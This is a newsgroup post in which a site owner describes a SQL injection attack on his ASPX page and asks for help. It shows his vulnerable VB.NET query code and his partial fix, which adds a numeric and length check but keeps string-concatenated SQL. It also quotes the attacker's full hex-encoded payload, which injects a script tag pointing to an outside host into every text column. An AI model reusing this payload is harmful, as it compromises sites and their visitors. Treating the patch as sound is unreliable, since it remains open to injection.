By teh way, I took a look at the page where this happened and realized what
they did. Here's what I used to have:
Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArgs) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QueryString("ClassmateID") <"" Then
dsClassmates.SelectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " &
Request.QueryString("ClassmateID")
dsClassmates.DataBind()
End If
End If
End Sub
Here's what I chagned it to (the line that tests for IsNumeric is new):
Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArgs) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QueryString("ClassmateID") <"" Then
If IsNumeric(Request.QueryString("ClassmateID")) And
(Len(Request.QueryString("ClassmateID").ToString) < 6) Then
dsClassmates.SelectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " &
Request.QueryString("ClassmateID")
dsClassmates.DataBind()
End If
End If
End If
End Sub
I'm thinking that solves my problem in this spot. Does that make sense? This
is what the hacker did:
ClassmateID=616;DECLARE%20@S%20VARCHAR(4000);SET%2 0@S=CAST(0x4445434C4152452
04054205641524348415228323535292C40432056415243484 1522832353529204445434C415
245205461626C655F437572736F7220435552534F5220464F5 22053454C45435420612E6E616
D652C622E6E616D652046524F4D207379736F626A656374732 0612C737973636F6C756D6E732
06220574845524520612E69643D622E696420414E4420612E7 8747970653D27752720414E442
028622E78747970653D3939204F5220622E78747970653D333 5204F5220622E78747970653D3
23331204F5220622E78747970653D31363729204F50454E205 461626C655F437572736F72204
645544348204E4558542046524F4D205461626C655F4375727 36F7220494E544F2040542C404
3205748494C4528404046455443485F5354415455533D30292 0424547494E204558454328275
55044415445205B272B40542B275D20534554205B272B40432 B275D3D525452494D28434F4E5
645525428564152434841522834303030292C5B272B40432B2 75D29292B27273C73637269707
4207372633D687474703A2F2F7777772E706F72762E72752F6 A732E6A733E3C2F73637269707
43E27272729204645544348204E4558542046524F4D2054616 26C655F437572736F7220494E5
44F2040542C404320454E4420434C4F5345205461626C655F4 37572736F72204445414C4C4F4
3415445205461626C655F437572736F7220%20AS%20VARCHAR (4000));EXEC(@S);
So it seems to me if I test for numeric and limit the lenght of the query
string I should be covered.
Any comments?
(still wondering about the MS injection analyzer too also)
Thanks,
Keith
"Keith G Hicks" <kr*@comcast.netwrote in message
news:#k**************@TK2MSFTNGP02.phx.gbl...
I have a site that is made up of sevearl aspx pages. It was recently
attacked by sql injection. I downloaded the tool described here:
http://support.microsoft.com/kb/954476 but can't seem to run it correctly.
All the examples are for asp pages, not aspx pages. I tried to find a
similar tool for aspx with no luck. When I run the tool on one of my aspx
pages I get errors, not sql injection problems.
Here's an example from the readme.html file for the tool:
msscasi_asp.exe /input="c:\source\logon.asp" /output="warnings.xml"
Here's one of the warnigns I get:
** msscasi_asp: Parse warning at C:\Inetpub\wwwroot\MySite\logon.aspx
(line
2, column 94): Ignoring unexpected settings directive. Settings directive
must be unique and must be placed at the beginning of the file.
And there's nothing in my output file. It looks like this:
<?xml version="1.0" encoding="UTF-8"?>
<DEFECTS>
</DEFECTS>
<!--SEQ:0000000000-->
What do I do to run this on my aspx pages?
Can anyone help me out here? If I'm in the wrong newsgroup for this,
please
tell me where I should post instead.
Thanks,
Keith